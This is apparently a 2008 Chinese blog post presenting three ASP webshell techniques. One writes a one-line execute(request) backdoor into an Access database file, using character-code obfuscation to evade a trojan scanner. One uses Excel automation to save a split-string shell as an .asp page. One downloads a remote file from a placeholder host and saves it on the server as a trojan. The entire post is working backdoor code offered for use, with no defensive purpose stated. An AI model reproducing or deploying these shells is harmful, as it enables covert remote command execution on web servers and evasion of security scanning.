by 博主
18. 八月 2008 10:37
一.绕过lake Asp木马扫描的小马
<%
set c = CreateObject("ADOX.Catalog")
c.create("Provider=Microsoft.Jet.OLEDB.4.0;Data Source="&Server.MapPath("/include/a.asp"))
set c = Nothing
c&Server.MapPath("a.asp")
set conn=server.createobject("Adodb.Connection")
conn.open connstr
conn.execute("create table nomm(nomuma oleobject)")
set rs=server.createobject("adodb.recordset")
sql="SELECT * FROM nomm"
rs.open sql,conn,1,3
rs.addnew
rs("nomuma").appendchunk(chrB(asc("〈"))&chrB(asc("%"))&chrB(asc("e"))&chrB(asc("x"))&chrB(asc("e"))&chrB(asc("c"))
&chrB(asc("u"))&chrB(asc("t"))&chrB(asc("e"))&chrB(asc("+"))&chrB(asc("r"))&chrB(asc("e"))&chrB(asc("q"))&chrB(asc
("u"))&chrB(asc("e"))&chrB(asc("s"))&chrB(asc("t"))&chrB(asc("("))&chrB(34)&chrB(asc("q"))&chrB(34)&chrB(asc(")"))
&chrB(asc("%"))&chrB(asc("〉")))
rs.update
rs.close
set rs=nothing
conn.close
set conn=nothing
%>
二.xls版asp webshell
<%
Set xlA = Server.CreateObject("Excel.Application")
xlA.Visible = False
xlA.Workbooks.Add
Set xlWorksheet = xlA.Worksheets(1)
xlWorksheet.Cells(1,1).Value = "〈%ex"&"ec"&"ute(request(""q""))"+chr(37)+"〉"
’strFile = "d:\test.asp"
strFile = Server.MapPath("test.asp")
xlWorkSheet.SaveAs strFile
xlA.Quit
Set xlWorksheet = Nothing
Set xlA = Nothing
%>
三、让网页自动下载木马并保存
<%
Set xPost = CreateObject("Microsoft.XMLHTTP")
xPost.Open "GET","http://xxxx/admin.txt",False
xPost.Send()
Set sGet = CreateObject("ADODB.Stream")
sGet.Mode = 3
sGet.Type = 1
sGet.Open()
sGet.Write(xPost.responseBody)
sGet.SaveToFile Server.MapPath("fox.asp"),2
set sGet = nothing
set sPOST = nothing
response.Write("下载文件成功!<br>")
%>
订阅